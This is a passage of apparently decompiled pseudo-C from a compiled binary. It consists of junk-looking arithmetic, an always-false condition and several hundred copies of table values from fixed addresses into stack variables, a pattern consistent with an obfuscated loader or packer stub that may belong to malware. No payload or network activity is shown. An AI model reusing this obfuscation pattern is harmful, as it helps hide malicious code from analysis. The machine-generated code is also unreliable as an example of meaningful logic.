      				_v244 = _v316 | 0x0000004d;
      				if(_v244 < _v244) {
      					_v217 = _v20 - _v144 - 0x00000048 & _v204 + 0x0000003d;
      					_v24 = _v200 + _v312 + _v88 - 0x2b;
      				} else {
      					_v41 = 0x48 - _v68 + 0x12 - _v292 - (_v25 & 0x000000ff);
      					_v200 = _v268 + _v64;
      				}
      				_v80 = (_v25 & 0x000000ff) + 0x0000000d & _v180;
      				_v160 = 0x8296cbee;
      				_v316 = (_v208 & 0x0000ffff) - 4;
      				 *0x42c024 = (_v164 & 0x0000ffff ^ _v133 & 0x000000ff) &  *0x42c024;
      				_v140 = (_v166 & 0x000000ff) + _v312;
      				do {
      					_v188 = _v180 - _v144 + _v180 + (_v288 & 0x0000ffff);
      					_v236 = (_v7 & 0x000000ff) + _v144 - 0x57;
      					_v104 = (_v24 & 0x0000ffff) + _v204 - _v316 & _v56;
      					_v212 = 0xfffffff5;
      					_v192 = _v56 + _v212 | 0x0000000b;
      					_v6 = _v124 - _v88 | _v264 - (_v237 & 0x000000ff) - _v144;
      					_v188 = _v88 - 0x89;
      					_t1630 =  *0x42c008; // 0xd9
      					_v236 = _v12 + _t1630 - 0x29;
      					_v236 = 0x4c - (_v301 & 0x000000ff);
      					_v300 = _v60;
      					_v181 = 0x1d - _v244 + _v316 - (_v7 & 0x000000ff) + _v156;
      					_v144 = _v204 + 0x16;
      					_t382 = (_v208 & 0x0000ffff) + 0x2f; // 0xd1
      					_v5 = 0xa2 - (_v301 & 0x000000ff) + _t382;
      					_v237 = _v140 - _v264 + 0x00000031 & _v268;
      					_t1999 =  *0x42d03c; // 0x0
      					_v145 = _t1999 - _v144 - _v180 - (_v165 & 0x000000ff) + 0x35;
      					_t395 = _v268 + 0x47; // 0x5f
      					_v64 = _v156 + _t395;
      					_v292 = (_v193 & 0x000000ff) + _v308 +  *0x42c008;
      					_v216 = _v300 + 1;
      					 *0x42c028 = _v88;
      					_v228 = _v316 - 0x0000005f ^ _v244;
      					_v48 = (_v145 & 0x000000ff) - _v264 + (_v133 & 0x000000ff) & _v48;
      					_v312 = _v88 + 0x4c;
      					_v12 = _v212 & 0x0000002c | _v244;
      					_v124 = 0xf -  *0x436050 + 0x37;
      					_v133 = _v280 + _v64 + 0x0000006f | 0x00000061;
      					_v260 = (_v165 & 0x000000ff) - 0x0000002e & _v80 & _v68;
      					_v92 = _v216 - _v273;
      					_v5 = (_v132 & 0x0000ffff) - (_v32 & 0x0000ffff) + 0x00000012 ^ _v312 - _v88;
      					if(_v268 <= 0x3a) {
      						_v264 = (_v84 & 0x0000ffff) + 0x31;
      						_v308 = _v76 + _v264 - 0x1b;
      					}
      					_v109 = _v312 +  *0x42d034 + _v212 - 3 + _v88;
      					_v324 = 0x2a0;
      					_t2019 = _v133 & 0x000000ff;
      					_t1653 =  *0x42c000; // 0x12
      					_t451 = _t2019 - 8; // 0xa
      					_v181 = (_v181 & 0x000000ff) - (_t1653 + _t451 ^ _v316);
      					_v172 = 0x0000001d - _v36 ^ 0x5c;
      					_t2022 =  *0x42c010; // 0x48
      					_v284 = _v284 & 0x0000ffff | (_v32 & 0x0000ffff) - _v316 & _t2022 + _v244;
      					_v320 = 0x180;
      					_v124 = (_v25 & 0x000000ff) + _v156 | 0x00000041;
      					_v116 = _v273 * _v216 * _v92;
      					_v6 = _v80 - (_v132 & 0x0000ffff) + _v156 + 0xa7;
      					_v124 = _v68 - (_v165 & 0x000000ff) ^ _v133 & 0x000000ff;
      					_v32 = _v284;
      					_v124 = 0x42 - (_v32 & 0x0000ffff) - _v200;
      					_v208 = _v208 & 0x0000ffff ^ (_v312 + 0x00000019 | 0x00000043);
      					_t1666 =  *0x42c014; // 0x536cedcb
      					_v288 = _t1666 - 0x8f;
      					_v8284 =  *0x417a10;
      					_v8276 =  *0x417a08;
      					_v8268 =  *0x417a00;
      					_v8260 =  *0x4179f8;
      					_v8252 =  *0x4179f0;
      					_v8244 =  *0x4179e8;
      					_v8236 =  *0x4179e0;
      					_v8228 =  *0x4179d8;
      					_v8220 =  *0x4179d0;
      					_v8212 =  *0x4179f8;
      					_v8204 =  *0x4179c8;
      					_v8196 =  *0x4179c0;
      					_v8188 =  *0x4179f8;
      					_v8180 =  *0x4179b8;
      					_v8172 =  *0x4179b0;
      					_v8164 =  *0x4179a8;
      					_v8156 =  *0x4179a0;
      					_v8148 =  *0x417998;
      					_v8140 =  *0x417990;
      					_v8132 =  *0x417988;
      					_v8124 =  *0x417980;
      					_v8116 =  *0x417978;
      					_v8108 =  *0x417970;
      					_v8100 =  *0x417968;
      					_v8092 =  *0x417960;
      					_v8084 =  *0x417958;
      					_v8076 =  *0x417950;
      					_v8068 =  *0x417948;
      					_v8060 =  *0x417940;
      					_v8052 =  *0x417938;
      					_v8044 =  *0x417930;
      					_v8036 =  *0x417928;
      					_v8028 =  *0x417920;
      					_v8020 =  *0x417918;
      					_v8012 =  *0x417910;
      					_v8004 =  *0x4179d8;
      					_v7996 =  *0x417908;
      					_v7988 =  *0x417900;
      					_v7980 =  *0x4178f8;
      					_v7972 =  *0x417940;
      					_v7964 =  *0x4178f0;
      					_v7956 =  *0x4178e8;
      					_v7948 =  *0x4178e0;
      					_v7940 =  *0x4178d8;
      					_v7932 =  *0x4178d0;
      					_v7924 =  *0x4178c8;
      					_v7916 =  *0x4178c0;
      					_v7908 =  *0x4178b8;
      					_v7900 =  *0x417938;
      					_v7892 =  *0x4178b0;
      					_v7884 =  *0x4178b0;
      					_v7876 =  *0x4178a8;
      					_v7868 =  *0x4178a0;
      					_v7860 =  *0x417898;
      					_v7852 =  *0x417890;
      					_v7844 =  *0x417888;
      					_v7836 =  *0x417880;
      					_v7828 =  *0x417878;
      					_v7820 =  *0x417870;
      					_v7812 =  *0x4179b8;
      					_v7804 =  *0x417868;
      					_v7796 =  *0x417860;
      					_v7788 =  *0x417868;
      					_v7780 =  *0x417858;
      					_v7772 =  *0x417850;
      					_v7764 =  *0x417848;
      					_v7756 =  *0x417840;
      					_v7748 =  *0x417838;
      					_v7740 =  *0x417830;
      					_v7732 =  *0x417828;
      					_v7724 =  *0x417820;
      					_v7716 =  *0x417818;
      					_v7708 =  *0x417810;
      					_v7700 =  *0x417808;
      					_v7692 =  *0x417820;
      					_v7684 =  *0x417800;
      					_v7676 =  *0x417858;
      					_v7668 =  *0x4177f8;
      					_v7660 =  *0x4177f0;
      					_v7652 =  *0x4177f0;
      					_v7644 =  *0x4177e8;
      					_v7636 =  *0x4177e0;
      					_v7628 =  *0x4177d8;
      					_v7620 =  *0x4177d0;
      					_v7612 =  *0x4178e8;
      					_v7604 =  *0x4177e8;
      					_v7596 =  *0x4177c8;
      					_v7588 =  *0x4177c0;
      					_v7580 =  *0x417900;
      					_v7572 =  *0x417900;
      					_v7564 =  *0x4177b8;
      					_v7556 =  *0x4177b0;
      					_v7548 =  *0x4178f8;
      					_v7540 =  *0x4177a8;
      					_v7532 =  *0x417928;
      					_v7524 =  *0x4177a0;
      					_v7516 =  *0x417798;
      					_v7508 =  *0x417790;
      					_v7500 =  *0x417858;
      					_v7492 =  *0x417788;
      					_v7484 =  *0x417788;
      					_v7476 =  *0x417780;
      					_v7468 =  *0x417778;
      					_v7460 =  *0x4179b0;
      					_v7452 =  *0x4179a0;
      					_v7444 =  *0x417770;
      					_v7436 =  *0x417768;
      					_v7428 =  *0x417998;
      					_v7420 =  *0x4177d8;
      					_v7412 =  *0x417760;
      					_v7404 =  *0x417758;
      					_v7396 =  *0x417820;
      					_v7388 =  *0x417860;
      					_v7380 =  *0x4177d0;
      					_v7372 =  *0x417968;
      					_v7364 =  *0x417750;
      					_v7356 =  *0x417748;
      					_v7348 =  *0x417740;
      					_v7340 =  *0x417738;
      					_v7332 =  *0x417908;
      					_v7324 =  *0x417730;
      					_v7316 =  *0x417728;
      					_v7308 =  *0x417720;
      					_v7300 =  *0x417718;
      					_v7292 =  *0x417900;
      					_v7284 =  *0x417710;
      					_v7276 =  *0x417780;
      					_v7268 =  *0x417708;
      					_v7260 =  *0x417780;
      					_v7252 =  *0x4179c8;
      					_v7244 =  *0x417700;
      					_v7236 =  *0x4176f8;
      					_v7228 =  *0x4177a0;
      					_v7220 =  *0x417a08;
      					_v7212 =  *0x4176f0;
      					_v7204 =  *0x4176e8;
      					_v7196 =  *0x4177e0;
      					_v7188 =  *0x4176e0;
      					_v7180 =  *0x4179b0;
      					_v7172 =  *0x4176d8;
      					_v7164 =  *0x4176d0;
      					_v7156 =  *0x4176c8;
      					_v7148 =  *0x4176c0;
      					_v7140 =  *0x417820;
      					_v7132 =  *0x4176f0;
      					_v7124 =  *0x4176b8;
      					_v7116 =  *0x4176b0;
      					_v7108 =  *0x4177d0;
      					_v7100 =  *0x4176a8;
      					_v7092 =  *0x417738;
      					_v7084 =  *0x417950;
      					_v7076 =  *0x4177d8;
      					_v7068 =  *0x4179b0;
      					_v7060 =  *0x4176a0;
      					_v7052 =  *0x4176e8;
      					_v7044 =  *0x417770;
      					_v7036 =  *0x4179d0;
      					_v7028 =  *0x417698;
      					_v7020 =  *0x417690;
      					_v7012 =  *0x417760;
      					_v7004 =  *0x417688;
      					_v6996 =  *0x417680;
      					_v6988 =  *0x417678;
      					_v6980 =  *0x417670;
      					_v6972 =  *0x417668;
      					_v6964 =  *0x417660;
      					_v6956 =  *0x417898;
      					_v6948 =  *0x417658;
      					_v6940 =  *0x417650;
      					_v6932 =  *0x417880;
      					_v6924 =  *0x417828;
      					_v6916 =  *0x417978;
      					_v6908 =  *0x417648;
      					_v6900 =  *0x417640;
      					_v6892 =  *0x417638;
      					_v6884 =  *0x417630;
      					_v6876 =  *0x4178d0;
      					_v6868 =  *0x417638;
      					_v6860 =  *0x4179e8;
      					_v6852 =  *0x4177c0;
      					_v6844 =  *0x417628;
      					_v6836 =  *0x4176c8;
      					_v6828 =  *0x4178e0;
      					_v6820 =  *0x417620;
      					_v6812 =  *0x417920;
      					_v6804 =  *0x4178c8;
      					_v6796 =  *0x417618;
      					_v6788 =  *0x4176b8;
      					_v6780 =  *0x417610;
      					_v6772 =  *0x417608;
      					_v6764 =  *0x417600;
      					_v6756 =  *0x4175f8;
      					_v6748 =  *0x4175f0;
      					_v6740 =  *0x417750;
      					_v6732 =  *0x417628;
      					_v6724 =  *0x4175e8;
      					_v6716 =  *0x4176d8;
      					_v6708 =  *0x417628;
      					_v6700 =  *0x417638;
      					_v6692 =  *0x417818;
      					_v6684 =  *0x417858;
      					_v6676 =  *0x4175e0;
      					_v6668 =  *0x417660;
      					_v6660 =  *0x4175d8;
      					_v6652 =  *0x417658;
      					_v6644 =  *0x417810;
      					_v6636 =  *0x4175d0;
      					_v6628 =  *0x4175c8;
      					_v6620 =  *0x417828;
      					_v6612 =  *0x417778;
      					_v6604 =  *0x4175e0;
      					_v6596 =  *0x4177c8;
      					_v6588 =  *0x417910;
      					_v6580 =  *0x4176b0;
      					_v6572 =  *0x4175c0;
      					_v6564 =  *0x4175b8;
      					_v6556 =  *0x4175b0;
      					_v6548 =  *0x4175a8;
      					_v6540 =  *0x417740;
      					_v6532 =  *0x417728;
      					_v6524 =  *0x417938;
      					_v6516 =  *0x4175a0;
      					_v6508 =  *0x4176f8;
      					_v6500 =  *0x417778;
      					_v6492 =  *0x417598;
      					_v6484 =  *0x4176e8;
      					_v6476 =  *0x4179c8;
      					_v6468 =  *0x4176e0;
      					_v6460 =  *0x417908;
      					_v6452 =  *0x417928;
      					_v6444 =  *0x417590;
      					_v6436 =  *0x417908;
      					_v6428 =  *0x417928;
      					_v6420 =  *0x417a08;
      					_v6412 =  *0x417988;
      					_v6404 =  *0x417880;
      					_v6396 =  *0x417588;
      					_v6388 =  *0x417580;
      					_v6380 =  *0x417640;
      					_v6372 =  *0x417858;
      					_v6364 =  *0x417580;
      					_v6356 =  *0x417810;
      					_v6348 =  *0x417578;
      					_v6340 =  *0x4177e0;
      					_v6332 =  *0x417938;
      					_v6324 =  *0x4176b8;
      					_v6316 =  *0x4177e0;
      					_v6308 =  *0x417938;
      					_v6300 =  *0x4178e0;
      					_v6292 =  *0x4179f8;
      					_v6284 =  *0x4178a8;
      					_v6276 =  *0x4178e0;
      					_v6268 =  *0x4175c0;
      					_v6260 =  *0x417570;
      					_v6252 =  *0x417568;
      					_v6244 =  *0x417560;
      					_v6236 =  *0x417558;
      					_v6228 =  *0x4178d8;
      					_v6220 =  *0x417550;
      					_v6212 =  *0x417580;
      					_v6204 =  *0x417548;
      					_v6196 =  *0x4179a8;
      					_v6188 =  *0x417820;
      					_v6180 =  *0x417540;
      					_v6172 =  *0x417538;
      					_v6164 =  *0x417970;
      					_v6156 =  *0x417530;
      					_v6148 =  *0x417850;
      					_v6140 =  *0x417528;
      					_v6132 =  *0x4179c0;
      					_v6124 =  *0x417520;
      					_v6116 =  *0x4178c8;
      					_v6108 =  *0x417898;
      					_v6100 =  *0x417748;
      					_v6092 =  *0x417518;
      					_v6084 =  *0x417510;
      					_v6076 =  *0x417578;
      					_v6068 =  *0x417508;
      					_v6060 =  *0x417500;
      					_v6052 =  *0x4175d0;
      					_v6044 =  *0x417538;
      					_v6036 =  *0x4174f8;
      					_v6028 =  *0x417840;
      					_v6020 =  *0x417760;
      					_v6012 =  *0x417870;
      					_v6004 =  *0x4179a0;
      					_v5996 =  *0x417978;
      					_v5988 =  *0x417640;
      					_v5980 =  *0x417918;
      					_v5972 =  *0x417830;
      					_v5964 =  *0x4174f0;
      					_v5956 =  *0x417880;
      					_v5948 =  *0x417528;
      					_v5940 =  *0x417848;
      					_v5932 =  *0x4174e8;
      					_v5924 =  *0x417760;
      					_v5916 =  *0x417840;
      					_v5908 =  *0x417a00;
      					_v5900 =  *0x417860;
      					_v5892 =  *0x4175b8;
      					_v5884 =  *0x4174e0;
      					_v5876 =  *0x4176f0;
      					_v5868 =  *0x4174d8;
      					_v5860 =  *0x417960;
      					_v5852 =  *0x4174d0;
      					_v5844 =  *0x4174c8;
      					_v5836 =  *0x417740;
      					_v5828 =  *0x417808;
      					_v5820 =  *0x4174c0;
      					_v5812 =  *0x4174b8;
      					_v5804 =  *0x417508;
      					_v5796 =  *0x417938;
      					_v5788 =  *0x4175d8;
      					_v5780 =  *0x4174b0;
      					_v5772 =  *0x4175a8;
      					_v5764 =  *0x417568;
      					_t2402 =  *0x4177b0;
      					_v5756 = _t2402;
      					asm("fld1");
      					_v5748 = _t2402;
      					_v5740 =  *0x4174a8;
      					_v5732 =  *0x4174a0;
      					_v5724 =  *0x417540;
      					_v5716 =  *0x417828;
      					_v5708 =  *0x4178d8;
      					_v5700 =  *0x417830;
      					_v5692 =  *0x417498;
      					_v5684 =  *0x417598;
      					_v5676 =  *0x417490;
      					_v5668 =  *0x417940;
      					_v5660 =  *0x417778;
      					_v5652 =  *0x417608;
      					_v5644 =  *0x417488;
      					_v5636 =  *0x417480;
      					_v5628 =  *0x4176f8;
      					_v5620 =  *0x417478;
      					_v5612 =  *0x417470;
      					_v5604 =  *0x417928;
      					_v5596 =  *0x417490;
      					_v5588 =  *0x4175c0;
      					_v5580 =  *0x417660;
      					_v5572 =  *0x417898;
      					_v5564 =  *0x417828;
      					_v5556 =  *0x417468;
      					_v5548 =  *0x4176d8;
      					_v5540 =  *0x4177f8;
      					_v5532 =  *0x417460;
      					_v5524 =  *0x417458;
      					_v5516 =  *0x4177f0;
      					_v5508 =  *0x4175e8;
      					_v5500 =  *0x4179d8;
      					_v5492 =  *0x4176b0;
      					_v5484 =  *0x417900;
      					_v5476 =  *0x417638;
      					_v5468 =  *0x417538;
      					_v5460 =  *0x417450;
      					_v5452 =  *0x4179c0;
      					_v5444 =  *0x417448;
      					_v5436 =  *0x417440;
      					_v5428 =  *0x417640;
      					_v5420 =  *0x417640;
      					_v5412 =  *0x417918;
      					_v5404 =  *0x4175f8;
      					_v5396 =  *0x417438;
      					_v5388 =  *0x417430;
      					_v5380 =  *0x417878;
      					_v5372 =  *0x417750;
      					_v5364 =  *0x417428;
      					_v5356 =  *0x417808;
      					_v5348 =  *0x417868;
      					_v5340 =  *0x417500;
      					_v5332 =  *0x417458;
      					_v5324 =  *0x417420;
      					_v5316 =  *0x417688;
      					_v5308 =  *0x4179c8;
      					_v5300 =  *0x417850;
      					_v5292 =  *0x417548;
      					_v5284 =  *0x417458;
      					_v5276 =  *0x417748;
      					_v5268 =  *0x417418;
      					_v5260 =  *0x4176a0;
      					_v5252 =  *0x417820;
      					_v5244 =  *0x4177c0;
      					_v5236 =  *0x417910;
      					_v5228 =  *0x417410;
      					_v5220 =  *0x4177a0;
      					_v5212 =  *0x417480;
      					_v5204 =  *0x417768;
      					_v5196 =  *0x417740;
      					_v5188 =  *0x4175d8;
      					_v5180 =  *0x417408;
      					_v5172 =  *0x417400;
      					_v5164 =  *0x417718;
      					_v5156 =  *0x4173f8;
      					_v5148 =  *0x4173f0;
      					_t2478 =  *0x4175f8;
      					_v5140 = _t2478;
      					asm("fld1");
      					_v5132 = _t2478;
      					_v5124 =  *0x4177e8;
      					_v5116 =  *0x417468;
      					_v5108 =  *0x417510;
      					_v5100 =  *0x417718;
      					_t2483 =  *0x417478;
      					_v5092 = _t2483;
      					asm("fld1");
      					_v5084 = _t2483;
      					_v5076 =  *0x417770;
      					_v5068 =  *0x417988;
      					_v5060 =  *0x417730;
      					_v5052 =  *0x417500;
      					_v5044 =  *0x4178c8;
      					_v5036 =  *0x4179b8;
      					_v5028 =  *0x417508;
      					_v5020 =  *0x4173e8;
      					_v5012 =  *0x4173e0;
      					_v5004 =  *0x417468;
      					_v4996 =  *0x417858;
      					_v4988 =  *0x4175f0;
      					_v4980 =  *0x417970;
      					_v4972 =  *0x417878;
      					_v4964 =  *0x417490;
      					_v4956 =  *0x417858;
      					_v4948 =  *0x4175f0;
      					_v4940 =  *0x4173d8;
      					_v4932 =  *0x4174e8;
      					_v4924 =  *0x4175d8;
      					_v4916 =  *0x417710;
      					_v4908 =  *0x417658;
      					_v4900 =  *0x4173d0;
      					_v4892 =  *0x4173c8;
      					_v4884 =  *0x4178d0;
      					_v4876 =  *0x4178b8;
      					_v4868 =  *0x4176d0;
      					_v4860 =  *0x4179c8;
      					_v4852 =  *0x417448;
      					_v4844 =  *0x417a00;
      					_v4836 =  *0x4179d0;
      					_v4828 =  *0x417498;
      					_v4820 =  *0x4175d8;
      					_v4812 =  *0x417888;
      					_v4804 =  *0x4175d8;
      					_v4796 =  *0x417948;
      					_v4788 =  *0x4173c0;
      					_v4780 =  *0x4173b8;
      					_v4772 =  *0x4173d0;
      					_v4764 =  *0x4179a8;
      					_v4756 =  *0x4178b0;
      					_v4748 =  *0x4173c8;
      					_v4740 =  *0x417768;
      					_v4732 =  *0x4175c8;
      					_v4724 =  *0x417918;
      					_v4716 =  *0x4173b0;
      					_v4708 =  *0x417448;
      					_v4700 =  *0x4173a8;
      					_v4692 =  *0x417910;
      					_v4684 =  *0x4177d0;
      					_v4676 =  *0x4173a0;
      					_v4668 =  *0x417398;
      					_v4660 =  *0x417810;
      					_v4652 =  *0x417940;
      					_v4644 =  *0x4175e0;
      					_v4636 =  *0x417928;
      					_v4628 =  *0x417390;
      					_v4620 =  *0x417508;
      					_v4612 =  *0x417818;
      					_v4604 =  *0x417580;
      					_v4596 =  *0x4175f0;
      					_v4588 =  *0x4178d0;
      					_v4580 =  *0x4175f0;
      					_v4572 =  *0x417468;
      					_v4564 =  *0x417860;
      					_v4556 =  *0x4176e8;
      					_v4548 =  *0x417460;
      					_v4540 =  *0x417988;
      					_v4532 =  *0x417538;
      					_v4524 =  *0x4175f0;
      					_v4516 =  *0x417468;
      					_v4508 =  *0x417388;
      					_v4500 =  *0x417888;
      					_v4492 =  *0x417910;
      					_v4484 =  *0x417380;
      					_v4476 =  *0x4179f0;
      					_v4468 =  *0x417600;
      					_v4460 =  *0x417378;
      					_v4452 =  *0x417598;
      					_v4444 =  *0x4175f8;
      					_v4436 =  *0x4175b8;
      					_v4428 =  *0x417398;
      					_v4420 =  *0x4174d8;
      					_v4412 =  *0x417990;
      					_v4404 =  *0x417370;
      					_v4396 =  *0x417790;
      					_v4388 =  *0x417708;
      					_v4380 =  *0x417368;
      					_v4372 =  *0x417600;
      					_v4364 =  *0x417608;
      					_v4356 =  *0x417738;
      					_v4348 =  *0x417988;
      					_v4340 =  *0x4174f8;
      					_v4332 =  *0x417400;
      					_v4324 =  *0x417808;
      					_t2579 =  *0x417400;
      					_v4316 = _t2579;
      					asm("fldz");
      					_v4308 = _t2579;
      					_v4300 =  *0x417360;
      					_v4292 =  *0x417630;
      					_v4284 =  *0x417860;
      					_v4276 =  *0x417580;
      					_v4268 =  *0x417920;
      					_v4260 =  *0x417358;
      					_v4252 =  *0x417760;
      					_v4244 =  *0x4176d8;
      					_v4236 =  *0x4177d8;
      					_v4228 =  *0x417998;
      					_v4220 =  *0x4179e0;
      					_v4212 =  *0x417350;
      					_v4204 =  *0x4174f0;
      					_v4196 =  *0x417490;
      					_v4188 =  *0x4173d8;
      					_v4180 =  *0x417930;
      					_v4172 =  *0x4174c0;
      					_v4164 =  *0x417348;
      					_v4156 =  *0x4177b8;
      					_v4148 =  *0x417760;
      					_v4140 =  *0x4178b0;
      					_v4132 =  *0x417758;
      					_v4124 =  *0x4176d0;
      					_v4116 =  *0x417340;
      					_v4108 =  *0x4175c8;
      					_v4100 =  *0x417550;
      					_v4092 =  *0x4173c8;
      					_v4084 =  *0x417630;
      					_v4076 =  *0x4174a8;
      					_v4068 =  *0x4176d8;
      					_v4060 =  *0x417930;
      					_v4052 =  *0x417338;
      					_v4044 =  *0x417548;
      					_v4036 =  *0x4179f8;
      					_v4028 =  *0x417608;
      					_v4020 =  *0x417498;
      					_v4012 =  *0x417998;
      					_v4004 =  *0x4176e8;
      					_v3996 =  *0x4179c0;
      					_v3988 =  *0x417710;
      					_v3980 =  *0x4174c8;
      					_v3972 =  *0x417578;
      					_v3964 =  *0x417340;
      					_v3956 =  *0x417548;
      					_v3948 =  *0x417330;
      					_v3940 =  *0x417520;
      					_v3932 =  *0x417498;
      					_v3924 =  *0x417848;
      					_v3916 =  *0x4177a8;
      					_v3908 =  *0x417620;
      					_v3900 =  *0x417400;
      					_v3892 =  *0x417810;
      					_v3884 =  *0x417678;
      					_v3876 =  *0x4174f0;
      					_v3868 =  *0x417338;
      					_v3860 =  *0x417328;
      					_v3852 =  *0x4173f8;
      					_v3844 =  *0x417440;
      					_v3836 =  *0x4179c0;
      					_v3828 =  *0x417400;
      					_v3820 =  *0x417438;
      					_v3812 =  *0x4175e0;
      					_v3804 =  *0x417598;
      					_v3796 =  *0x417320;
      					_v3788 =  *0x417318;
      					_v3780 =  *0x4179e0;
      					_v3772 =  *0x417368;
      					_v3764 =  *0x417a10;
      					_v3756 =  *0x417520;
      					_v3748 =  *0x417310;
      					_v3740 =  *0x4176c8;
      					_v3732 =  *0x417408;
      					_v3724 =  *0x4176e0;
      					_v3716 =  *0x4179c0;
      					_v3708 =  *0x417798;
      					_v3700 =  *0x417700;
      					_v3692 =  *0x4174b8;
      					_v3684 =  *0x417980;
      					_v3676 =  *0x417878;
      					_v3668 =  *0x4175f8;
      					_v3660 =  *0x417658;
      					_v3652 =  *0x417790;
      					_v3644 =  *0x417368;
      					_v3636 =  *0x417308;
      					_v3628 =  *0x417370;
      					_v3620 =  *0x4178e8;
      					_v3612 =  *0x417658;
      					_v3604 =  *0x4179f8;
      					_v3596 =  *0x417530;
      					_v3588 =  *0x4175d0;
      					_v3580 =  *0x417698;
      					_v3572 =  *0x4175d8;
      					_v3564 =  *0x4179f8;
      					_v3556 =  *0x417658;
      					_v3548 =  *0x417678;
      					_v3540 =  *0x417640;
      					_v3532 =  *0x4173b0;
      					_v3524 =  *0x4178e8;
      					_v3516 =  *0x417970;
      					_v3508 =  *0x417658;
      					_v3500 =  *0x417328;
      					_v3492 =  *0x417970;
      					_v3484 =  *0x417828;
      					_v3476 =  *0x417948;
      					_v3468 =  *0x417688;
      					_v3460 =  *0x417828;
      					_v3452 =  *0x4173f8;
      					_v3444 =  *0x417300;
      					_v3436 =  *0x417668;
      					_v3428 =  *0x4177b0;
      					_v3420 =  *0x4173a8;
      					_v3412 =  *0x417950;
      					_v3404 =  *0x417660;
      					_v3396 =  *0x417650;
      					_v3388 =  *0x417588;
      					_v3380 =  *0x417758;
      					_v3372 =  *0x417730;
      					_v3364 =  *0x4177c8;
      					_v3356 =  *0x417460;
      					_v3348 =  *0x417890;
      					_t2700 =  *0x417858;
      					_v3340 = _t2700;
      					asm("fld1");
      					_v3332 = _t2700;
      					_v3324 =  *0x417308;
      					_v3316 =  *0x4176e0;
      					_v3308 =  *0x4179e8;
      					_v3300 =  *0x4178c0;
      					_v3292 =  *0x417628;
      					_v3284 =  *0x417800;
      					_v3276 =  *0x4173c0;
      					_v3268 =  *0x417698;
      					_v3260 =  *0x417380;
      					_v3252 =  *0x4173a8;
      					_v3244 =  *0x4174c0;
      					_v3236 =  *0x4178a8;
      					_v3228 =  *0x417770;
      					_v3220 =  *0x4173d8;
      					_v3212 =  *0x417690;
      					_v3204 =  *0x417510;
      					_v3196 =  *0x417620;
      					_v3188 =  *0x4172f8;
      					_v3180 =  *0x4174b8;
      					_v3172 =  *0x417848;
      					_v3164 =  *0x417528;
      					_v3156 =  *0x417968;
      					_v3148 =  *0x4177a0;
      					_v3140 =  *0x417660;
      					_v3132 =  *0x4175d8;
      					_v3124 =  *0x417968;
      					_v3116 =  *0x4172f0;
      					_v3108 =  *0x4179b0;
      					_v3100 =  *0x417998;
      					_v3092 =  *0x417610;
      					_v3084 =  *0x4177b8;
      					_v3076 =  *0x417728;
      					_v3068 =  *0x4173f0;
      					_v3060 =  *0x417820;
      					_v3052 =  *0x417888;
      					_v3044 =  *0x417710;
      					_v3036 =  *0x417570;
      					_v3028 =  *0x417340;
      					_v3020 =  *0x417330;
      					_v3012 =  *0x417580;
      					_v3004 =  *0x417990;
      					_v2996 =  *0x4179c0;
      					_v2988 =  *0x4172e8;
      					_v2980 =  *0x417768;
      					_v2972 =  *0x4179c0;
      					_v2964 =  *0x417610;
      					_v2956 =  *0x417748;
      					_v2948 =  *0x4177b8;
      					_v2940 =  *0x417458;
      					_v2932 =  *0x417988;
      					_v2924 =  *0x4172f0;
      					_v2916 =  *0x417780;
      					_v2908 =  *0x417450;
      					_v2900 =  *0x4173f0;
      					_v2892 =  *0x417610;
      					_v2884 =  *0x4174a0;
      					_v2876 =  *0x417748;
      					_v2868 =  *0x417820;
      					_v2860 =  *0x417798;
      					_v2852 =  *0x417858;
      					_v2844 =  *0x417820;
      					_v2836 =  *0x417898;
      					_v2828 =  *0x417828;
      					_v2820 =  *0x4175f8;
      					_t2765 =  *0x4175f8;
      					_v2812 = _t2765;
      					asm("fldz");
      					_v2804 = _t2765;
      					_v2796 =  *0x417468;
      					_v2788 =  *0x4179e8;
      					_v2780 =  *0x417a08;
      					_v2772 =  *0x4177b0;
      					_v2764 =  *0x417728;
      					_v2756 =  *0x4174a0;
      					_v2748 =  *0x417820;
      					_v2740 =  *0x417938;
      					_v2732 =  *0x417370;
      					_v2724 =  *0x417460;
      					_v2716 =  *0x417328;
      					_v2708 =  *0x417968;
      					_v2700 =  *0x4173f8;
      					_v2692 =  *0x4178b0;
      					_v2684 =  *0x417920;
      					_v2676 =  *0x417478;
      					_v2668 =  *0x4178f8;
      					_v2660 =  *0x4178c0;
      					_v2652 =  *0x4176c0;
      					_v2644 =  *0x417728;
      					_v2636 =  *0x417800;
      					_v2628 =  *0x4179a0;
      					_v2620 =  *0x417740;
      					_v2612 =  *0x417800;
      					_v2604 =  *0x417478;
      					_v2596 =  *0x4172e0;
      					_v2588 =  *0x4172d8;
      					_v2580 =  *0x4173e0;
      					_v2572 =  *0x4177c8;
      					_v2564 =  *0x4173a0;
      					_v2556 =  *0x417890;
      					_v2548 =  *0x417960;
      					_v2540 =  *0x4173e8;
      					_v2532 =  *0x417968;
      					_v2524 =  *0x4176c8;
      					_v2516 =  *0x4175c0;
      					_t2802 =  *0x4175f0;
      					_v2508 = _t2802;
      					asm("fldz");
      					_v2500 = _t2802;
      					_v2492 =  *0x417660;
      					_v2484 =  *0x4174e0;
      					_v2476 =  *0x417848;
      					_v2468 =  *0x4172d0;
      					_v2460 =  *0x4172e0;
      					_v2452 =  *0x417868;
      					_v2444 =  *0x4172c8;
      					_v2436 =  *0x417a10;
      					_v2428 =  *0x417910;
      					_v2420 =  *0x417318;
      					_v2412 =  *0x4178d8;
      					_v2404 =  *0x4175d8;
      					_v2396 =  *0x417680;
      					_v2388 =  *0x4173b8;
      					_v2380 =  *0x417660;
      					_v2372 =  *0x417900;
      					_v2364 =  *0x4172c0;
      					_v2356 =  *0x4176f0;
      					_v2348 =  *0x417368;
      					_v2340 =  *0x417568;
      					_v2332 =  *0x4172b8;
      					_v2324 =  *0x417720;
      					_v2316 =  *0x417790;
      					_v2308 =  *0x4178f0;
      					_v2300 =  *0x417538;
      					_v2292 =  *0x417910;
      					_v2284 =  *0x417318;
      					_v2276 =  *0x417600;
      					_v2268 =  *0x4172b0;
      					_v2260 =  *0x4173e0;
      					_v2252 =  *0x417920;
      					_v2244 =  *0x417848;
      					_v2236 =  *0x417988;
      					_v2228 =  *0x417970;
      					_v2220 =  *0x417698;
      					_v2212 =  *0x417860;
      					_v2204 =  *0x4177f8;
      					_v2196 =  *0x417520;
      					_v2188 =  *0x4172a8;
      					_v2180 =  *0x417650;
      					_v2172 =  *0x417850;
      					_v2164 =  *0x417450;
      					_v2156 =  *0x417578;
      					_v2148 =  *0x417490;
      					_v2140 =  *0x417968;
      					_v2132 =  *0x417518;
      					_v2124 =  *0x417808;
      					_v2116 =  *0x417850;
      					_v2108 =  *0x417670;
